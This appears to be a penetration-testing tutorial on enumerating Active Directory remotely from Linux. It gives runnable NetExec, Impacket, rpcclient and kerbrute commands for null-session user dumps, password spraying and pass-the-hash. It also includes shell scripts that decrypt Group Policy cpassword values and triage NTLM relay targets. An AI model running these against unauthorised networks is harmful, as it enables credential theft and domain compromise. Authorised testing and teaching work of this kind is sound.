Remote AD Enumeration

Enumerate Active Directory from a Linux attack box with no shell on a domain host. Covers NetExec, Impacket, enum4linux-ng, rpcclient, SMB/RPC queries, and null session checks.


You have network access to the target environment from your Linux attack box. No shell on a domain-joined host yet. Start by identifying domain controllers, checking for null sessions, and pulling as much information as possible over SMB, RPC, and LDAP before you have credentials. Once you get a valid account, open up the full enumeration.


Identifying Domain Controllers

Before anything else, find the DCs. They run a predictable set of services.

terminal
# Nmap scan for common DC ports (-Pn skips host discovery, which Windows firewalls often block)
root@localhost:~# nmap -Pn -p 53,88,135,139,389,445,464,636,3268,3269 -sV 10.10.11.0/24

# DNS SRV record lookup (if you know the domain name)
root@localhost:~# dig SRV _ldap._tcp.dc._msdcs.corp.local @10.10.11.35
root@localhost:~# dig SRV _kerberos._tcp.corp.local @10.10.11.35

# Nmap script to grab domain info from SMB
root@localhost:~# nmap -p 445 --script smb-os-discovery 10.10.11.35
Port 88 (Kerberos) is the strongest single indicator of a DC: in an AD domain only domain controllers run a KDC. Port 3268 (Global Catalog) confirms a DC that also hosts the Global Catalog, which most do. If both are open, you are looking at a domain controller. A host with 389/636 open but no 88 is some other LDAP server (AD LDS, an appliance, a non-Windows directory), not a DC.
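The port heuristic above is easy to automate once the scan is saved in grepable form. The following is an added example, not part of the original page: a shell helper that reads `nmap -oG` output and reports hosts with Kerberos (88) and LDAP (389) open, flagging those that also serve the Global Catalog (3268). The sample scan data is constructed, and the output filename and subnet are assumptions.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: identify domain controllers from a
# grepable nmap scan. Assumes the scan was saved with
#   nmap -Pn -p 53,88,135,139,389,445,464,636,3268,3269 -oG dc_scan.gnmap 10.10.11.0/24
# (filename and subnet are assumptions).

# Constructed sample of -oG output: one DC that is also a Global Catalog server,
# one member server with only SMB/RPC open.
make_sample_gnmap() {
  cat > "$1" <<'EOF'
# Nmap 7.94 scan initiated as: nmap -Pn -p 53,88,135,139,389,445,464,636,3268,3269 -oG dc_scan.gnmap 10.10.11.0/24
Host: 10.10.11.35 () Status: Up
Host: 10.10.11.35 () Ports: 53/open/tcp//domain///, 88/open/tcp//kerberos-sec///, 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 464/open/tcp//kpasswd5///, 636/open/tcp//ldapssl///, 3268/open/tcp//globalcatLDAP///, 3269/open/tcp//globalcatLDAPssl///
Host: 10.10.11.50 () Status: Up
Host: 10.10.11.50 () Ports: 53/closed/tcp//domain///, 88/closed/tcp//kerberos-sec///, 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 389/closed/tcp//ldap///, 445/open/tcp//microsoft-ds///
# Nmap done
EOF
}

# Print "<ip> dc" for hosts with Kerberos (88) and LDAP (389) open, or
# "<ip> dc gc" when the Global Catalog port (3268) is open as well.
find_dcs() {
  grep '^Host: .*Ports: ' "$1" | while IFS= read -r line; do
    ip=${line#Host: }
    ip=${ip%% *}
    # Prefix a space so every port is matched as " <port>/open/" and 389 cannot match 3389.
    ports=" ${line#*Ports: }"
    case "$ports" in
      *" 88/open/"*) ;;
      *) continue ;;
    esac
    case "$ports" in
      *" 389/open/"*) ;;
      *) continue ;;
    esac
    case "$ports" in
      *" 3268/open/"*) printf '%s dc gc\n' "$ip" ;;
      *) printf '%s dc\n' "$ip" ;;
    esac
  done
}

# Just the IPs, for feeding into netexec or dig afterwards.
dc_ips() {
  find_dcs "$1" | cut -d' ' -f1
}

# Usage: ./find_dcs.sh dc_scan.gnmap
if [ $# -gt 0 ]; then
  find_dcs "$1"
fi
```

Matching on `" 88/open/"` with a leading space matters: the same loop run against a full port scan would otherwise accept 3389 (RDP) as 389.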

Null Session and Anonymous Enumeration

Some DCs still allow unauthenticated access over SMB, RPC, or LDAP. Always check before assuming you need credentials.

NetExec (Null/Guest Checks)

terminal
# Check null session on SMB
root@localhost:~# netexec smb 10.10.11.35 -u '' -p ''

# Check guest session
root@localhost:~# netexec smb 10.10.11.35 -u 'guest' -p ''

# Attempt user, share and group enumeration via null session
root@localhost:~# netexec smb 10.10.11.35 -u '' -p '' --users
root@localhost:~# netexec smb 10.10.11.35 -u '' -p '' --shares
root@localhost:~# netexec smb 10.10.11.35 -u '' -p '' --groups

# RID brute force through null session (finds users even when --users fails)
root@localhost:~# netexec smb 10.10.11.35 -u '' -p '' --rid-brute 10000

enum4linux-ng

A modern rewrite of enum4linux. Runs all SMB/RPC enumeration checks in one shot.

terminal
# Full enumeration with null session
root@localhost:~# enum4linux-ng -A 10.10.11.35

# With credentials
root@localhost:~# enum4linux-ng -A 10.10.11.35 -u svc_backup -p 'P@ssw0rd123'

# Output to JSON for parsing
root@localhost:~# enum4linux-ng -A -oJ enum_output 10.10.11.35

rpcclient (Null Session)

terminal
# Connect with null session
root@localhost:~# rpcclient -U '' -N 10.10.11.35

# Inside rpcclient - common commands
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> querygroupmem 0x200
rpcclient $> queryuser 0x1f4
rpcclient $> getdompwinfo
rpcclient $> enumprinters
rpcclient $> netshareenumall
querygroupmem 0x200 queries the Domain Admins group (RID 512 = 0x200). queryuser 0x1f4 queries the built-in Administrator (RID 500 = 0x1f4). Use enumdomusers first to get RIDs, then query individual users.

SMB Enumeration

Share Enumeration

terminal
# List shares (authenticated)
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --shares

# Spider shares for interesting files
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -M spider_plus

# smbclient - list shares
root@localhost:~# smbclient -L //10.10.11.35 -U 'svc_backup%P@ssw0rd123'

# smbclient - connect to a share
root@localhost:~# smbclient //10.10.11.35/SYSVOL -U 'svc_backup%P@ssw0rd123'

# smbmap - check permissions on all shares
root@localhost:~# smbmap -H 10.10.11.35 -u svc_backup -p 'P@ssw0rd123'

# smbmap - recursive listing of a share
root@localhost:~# smbmap -H 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -r SYSVOL --depth 5

SYSVOL and GPP Passwords

SYSVOL is readable by every authenticated domain user (the share and NTFS ACLs grant Authenticated Users read access). It holds Group Policy files, and some of them contain credentials.

terminal
# Search SYSVOL for Group Policy Preference (GPP) passwords
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -M gpp_password

# Manual SYSVOL search for cpassword in XML files
root@localhost:~# smbclient //10.10.11.35/SYSVOL -U 'svc_backup%P@ssw0rd123' -c 'recurse on; prompt off; mget *'
root@localhost:~# grep -ri "cpassword" corp.local/

# Decrypt GPP password (if found)
root@localhost:~# gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
MS14-025 stopped Group Policy Preferences from storing new cpassword values, but it did not remove existing ones, so legacy XML files (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml under Policies/<GUID>/MACHINE or USER/Preferences) may still carry them. Microsoft published the AES-256 key, so anyone who can read SYSVOL can decrypt them. Always check.
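The decryption itself needs nothing beyond openssl and iconv, which is useful when gpp-decrypt is not installed. The following is an added example, not part of the original page: it walks a SYSVOL copy pulled with the smbclient mget above, pulls every cpassword out of the XML, and decrypts it with the published key. The sample Groups.xml, its path and the svc_gpp account are constructed; the cpassword value is the one shown above.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: locate cpassword values in a
# downloaded SYSVOL tree and decrypt them with openssl and iconv instead of
# gpp-decrypt. The AES-256-CBC key is the one Microsoft published in MS-GPPREF;
# the IV is 16 zero bytes. The sample Groups.xml, its path and the account
# name are constructed.

GPP_AES_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
GPP_AES_IV=00000000000000000000000000000000

# Decrypt one cpassword value. GPP strips the base64 '=' padding, so restore it
# first; the plaintext is UTF-16LE, so convert it to UTF-8 for printing.
gpp_decrypt() {
  cpass=$1
  while [ $(( ${#cpass} % 4 )) -ne 0 ]; do
    cpass="${cpass}="
  done
  printf '%s' "$cpass" | base64 -d \
    | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv "$GPP_AES_IV" \
    | iconv -f UTF-16LE -t UTF-8
}

# Walk a SYSVOL copy and print "<file> <userName> <password>" for every
# non-empty cpassword. Groups.xml uses userName; Services.xml (accountName) and
# ScheduledTasks.xml (runAs) name the account differently, so fall back to the
# file path when no userName attribute is present.
gpp_scan() {
  grep -rli 'cpassword=' "$1" | while IFS= read -r f; do
    grep -oi 'cpassword="[^"]*"' "$f" | while IFS= read -r attr; do
      cpass=${attr#*\"}
      cpass=${cpass%\"}
      # An empty cpassword means the policy clears the password; nothing to decrypt.
      [ -n "$cpass" ] || continue
      user=$(grep -oi 'userName="[^"]*"' "$f" | head -n 1)
      user=${user#*\"}
      user=${user%\"}
      printf '%s\t%s\t%s\n' "$f" "${user:-<no userName>}" "$(gpp_decrypt "$cpass")"
    done
  done
}

# Constructed sample: one Groups.xml under the Default Domain Policy GUID.
make_sample_sysvol() {
  d="$1/corp.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups"
  mkdir -p "$d"
  cat > "$d/Groups.xml" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="corp.local\svc_gpp" image="2" changed="2018-07-18 20:46:06" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="corp.local\svc_gpp"/>
  </User>
</Groups>
EOF
}

# Usage: ./gpp_scan.sh ./corp.local   (the directory smbclient created)
if [ $# -gt 0 ]; then
  gpp_scan "$1"
fi
```

The padding loop is the part people get wrong by hand: the value in the XML is valid base64 with its trailing '=' characters removed, and base64 -d rejects it until they are put back.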

RPC Enumeration (Authenticated)

rpcclient with Credentials

terminal
root@localhost:~# rpcclient -U 'corp.local/svc_backup%P@ssw0rd123' 10.10.11.35

# User enumeration
rpcclient $> enumdomusers
rpcclient $> queryuser svc_backup
rpcclient $> queryusergroups 0x451

# Group enumeration
rpcclient $> enumdomgroups
rpcclient $> querygroupmem 0x200
rpcclient $> querygroup 0x200

# Domain info
rpcclient $> querydominfo
rpcclient $> getdompwinfo

# SID lookups
rpcclient $> lookupnames "Domain Admins"
rpcclient $> lookupsids S-1-5-21-3842939050-3880317879-2865463114-512

# Enumerate trusts
rpcclient $> dsr_enumtrustdom
rpcclient $> enumtrust

Impacket RPC Tools

terminal
# lookupsid - RID cycling to enumerate users (works through null sessions too)
root@localhost:~# impacket-lookupsid corp.local/svc_backup:'P@ssw0rd123'@10.10.11.35

# Null session RID cycling
root@localhost:~# impacket-lookupsid anonymous@10.10.11.35 -no-pass -domain-sids

# samrdump - dump SAM info over RPC
root@localhost:~# impacket-samrdump corp.local/svc_backup:'P@ssw0rd123'@10.10.11.35

# reg.py - remote registry queries (quote the key so the shell keeps the backslashes)
root@localhost:~# impacket-reg corp.local/svc_backup:'P@ssw0rd123'@10.10.11.35 query -keyName 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -v EnableLUA

NetExec Full Enumeration

NetExec is the Swiss Army knife for remote AD enumeration. These are the modules and flags you will use most.

User and Group Enumeration

terminal
# Dump all users
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --users

# Dump all groups
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --groups

# RID brute force (catches accounts that --users misses)
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --rid-brute 10000

# Logged-on users
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --loggedon-users

# Check local admin access across a subnet
root@localhost:~# netexec smb 10.10.11.0/24 -u svc_backup -p 'P@ssw0rd123'

# Find hosts where current user is local admin
root@localhost:~# netexec smb 10.10.11.0/24 -u svc_backup -p 'P@ssw0rd123' | grep "(Pwn3d!)"

Password Policy

terminal
# Domain password policy (over SMB/RPC)
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --pass-pol

# Password policy over LDAP (same data, different protocol)
root@localhost:~# netexec ldap 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' --pass-pol

Useful Modules

terminal
# Enumerate LAPS passwords
root@localhost:~# netexec ldap 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -M laps

# Check for WebDAV on hosts (useful for coercion attacks)
root@localhost:~# netexec smb 10.10.11.0/24 -u svc_backup -p 'P@ssw0rd123' -M webdav

# Enumerate antivirus products
root@localhost:~# netexec smb 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -M enum_av

# Check for signing (important for relay attacks)
root@localhost:~# netexec smb 10.10.11.0/24 -u svc_backup -p 'P@ssw0rd123' --gen-relay-list relay_targets.txt

# Enumerate ADCS enrollment servers (PKI Enrollment Service objects over LDAP)
root@localhost:~# netexec ldap 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -M adcs

# Pull user description fields (admins sometimes leave passwords in them)
root@localhost:~# netexec ldap 10.10.11.35 -u svc_backup -p 'P@ssw0rd123' -M get-desc-users
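A subnet-wide NetExec sweep answers two of the questions above at once: which hosts skip SMB signing (relay targets) and which ones return Pwn3d! (local admin). The following is an added example, not part of the original page: a shell helper that turns saved NetExec output into those lists, plus the set of relay targets where the credential is not already admin. The sample output is constructed, and the filename is an assumption.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: turn a saved NetExec SMB sweep into
# target lists. Assumes the sweep was saved with
#   netexec smb 10.10.11.0/24 -u svc_backup -p 'P@ssw0rd123' | tee nxc_sweep.txt
# (filename is an assumption). The sample output below is constructed.

make_sample_nxc() {
  cat > "$1" <<'EOF'
SMB         10.10.11.35     445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.11.50     445    FILE01           [*] Windows Server 2016 Build 14393 x64 (name:FILE01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.10.11.61     445    WS01             [*] Windows 10 Build 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.10.11.35     445    DC01             [+] corp.local\svc_backup:P@ssw0rd123
SMB         10.10.11.50     445    FILE01           [+] corp.local\svc_backup:P@ssw0rd123 (Pwn3d!)
SMB         10.10.11.61     445    WS01             [+] corp.local\svc_backup:P@ssw0rd123
EOF
}

# Hosts that do not enforce SMB signing: NTLM relay can land on them.
# Field 2 of every nxc line is the target IP.
relay_targets() {
  awk '/\(signing:False\)/ { print $2 }' "$1" | sort -u
}

# Hosts where the credential is local admin (Pwn3d!).
admin_hosts() {
  awk '/\(Pwn3d!\)/ { print $2 }' "$1" | sort -u
}

# Hosts still accepting SMBv1.
smbv1_hosts() {
  awk '/\(SMBv1:True\)/ { print $2 }' "$1" | sort -u
}

# Relay targets where this credential is not already admin. Relaying a more
# privileged victim into these gains something new; relaying into hosts you
# already own with the current account does not.
relay_not_owned() {
  awk '/\(signing:False\)/ { relay[$2] = 1 }
       /\(Pwn3d!\)/        { owned[$2] = 1 }
       END { for (h in relay) if (!(h in owned)) print h }' "$1" | sort
}

# Usage: ./nxc_triage.sh nxc_sweep.txt
if [ $# -gt 0 ]; then
  printf 'Relay targets (signing off):\n'; relay_targets "$1"
  printf 'Local admin (Pwn3d!):\n';        admin_hosts "$1"
  printf 'Relay into (not yet owned):\n';  relay_not_owned "$1"
fi
```

The relay_targets list is what --gen-relay-list writes; keeping the raw sweep lets you also cut the SMBv1 and admin lists from the same run instead of re-touching every host.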

Impacket Enumeration Tools

Domain User and Share Enumeration

terminal
# GetADUsers - dump domain users over LDAP
root@localhost:~# impacket-GetADUsers -all corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35

# GetUserSPNs - find Kerberoastable accounts
root@localhost:~# impacket-GetUserSPNs corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35

# GetNPUsers - find AS-REP roastable accounts
root@localhost:~# impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.10.11.35 -no-pass -format hashcat

# smbclient.py - interactive SMB shell
root@localhost:~# impacket-smbclient corp.local/svc_backup:'P@ssw0rd123'@10.10.11.35

Authentication Methods

All Impacket tools support multiple authentication methods. Use the one that matches what you have.

terminal
# Password authentication
root@localhost:~# impacket-GetADUsers -all corp.local/svc_backup:'P@ssw0rd123' -dc-ip 10.10.11.35

# NTLM hash (pass-the-hash)
root@localhost:~# impacket-GetADUsers -all corp.local/svc_backup -hashes :a3f1b9c2d4e5f6a7b8c9d0e1f2a3b4c5 -dc-ip 10.10.11.35

# Kerberos ticket (pass-the-ticket)
root@localhost:~# export KRB5CCNAME=/tmp/svc_backup.ccache
root@localhost:~# impacket-GetADUsers -all corp.local/svc_backup -dc-ip 10.10.11.35 -k -no-pass

# AES key
root@localhost:~# impacket-GetADUsers -all corp.local/svc_backup -aesKey 4a3f2b1c... -dc-ip 10.10.11.35 -k -no-pass

DNS Enumeration

AD-integrated DNS zones contain host records, CNAME aliases, and SRV records that map out the entire domain.

terminal
# Zone transfer attempt (rarely works but always try)
root@localhost:~# dig axfr corp.local @10.10.11.35

# Enumerate common SRV records
root@localhost:~# dig SRV _ldap._tcp.corp.local @10.10.11.35
root@localhost:~# dig SRV _kerberos._tcp.corp.local @10.10.11.35
root@localhost:~# dig SRV _gc._tcp.corp.local @10.10.11.35
root@localhost:~# dig SRV _kpasswd._tcp.corp.local @10.10.11.35

# Reverse lookup sweep
root@localhost:~# for i in $(seq 1 254); do dig -x 10.10.11.$i @10.10.11.35 +short; done

# adidnsdump - pull all DNS records from LDAP (authenticated)
root@localhost:~# adidnsdump -u 'corp.local\svc_backup' -p 'P@ssw0rd123' 10.10.11.35
root@localhost:~# cat records.csv

# dnstool.py - query and manipulate AD-integrated DNS
root@localhost:~# python3 dnstool.py -u 'corp.local\svc_backup' -p 'P@ssw0rd123' -r '*' --zone corp.local 10.10.11.35 -a query
adidnsdump pulls DNS records directly from the LDAP directory, including records that are hidden from standard DNS queries. Wildcard records and tombstoned entries can reveal decommissioned hosts and internal services.

Kerberos User Enumeration (No Creds)

The KDC's reply to an AS-REQ that carries no pre-authentication data differs for valid and invalid usernames (KDC_ERR_PREAUTH_REQUIRED versus KDC_ERR_C_PRINCIPAL_UNKNOWN), so valid users can be enumerated with no credentials at all.

terminal
# kerbrute - fast Kerberos user enumeration
root@localhost:~# kerbrute userenum --dc 10.10.11.35 -d corp.local users.txt

# kerbrute - password spray (single password against user list)
root@localhost:~# kerbrute passwordspray --dc 10.10.11.35 -d corp.local users.txt 'Winter2026!'

# Nmap Kerberos enumeration
root@localhost:~# nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='corp.local',userdb=users.txt 10.10.11.35
Username enumeration this way does not lock accounts out: the AS-REQ carries no pre-authentication data, so the DC answers with an error before any password check happens and no failed logon is counted. That makes it safe for large user lists, but not quiet: it produces event ID 4768 entries on the DC, including failure code 0x6 for names that do not exist. Password spraying with kerbrute is different: every wrong password is a real pre-authentication failure (event ID 4771) that counts toward the lockout threshold, so pull the password policy (--pass-pol) first and stay under it.

Quick Recon Workflow

1. Port Scan and DC Identification: Nmap the subnet for ports 88, 389, 445, 636, 3268. Identify DCs and note the domain name from SMB OS discovery or LDAP RootDSE.

2. Null Session Checks: Try anonymous access on SMB, RPC, and LDAP. Run enum4linux-ng with no creds, and try RID brute forcing through null sessions with NetExec and impacket-lookupsid.

3. Kerberos User Enumeration: If you have a wordlist, run kerbrute to validate usernames. This works without any credentials.

4. Authenticated Enumeration: Once you have a valid account, run NetExec with --users, --groups, --shares, --pass-pol. Dump SYSVOL for GPP passwords. Run spider_plus to find files on shares.

5. Full Data Collection: Run BloodHound collection (bloodhound-python), dump DNS with adidnsdump, check for LAPS, ADCS, and SMB signing. Build your target list for the next phase.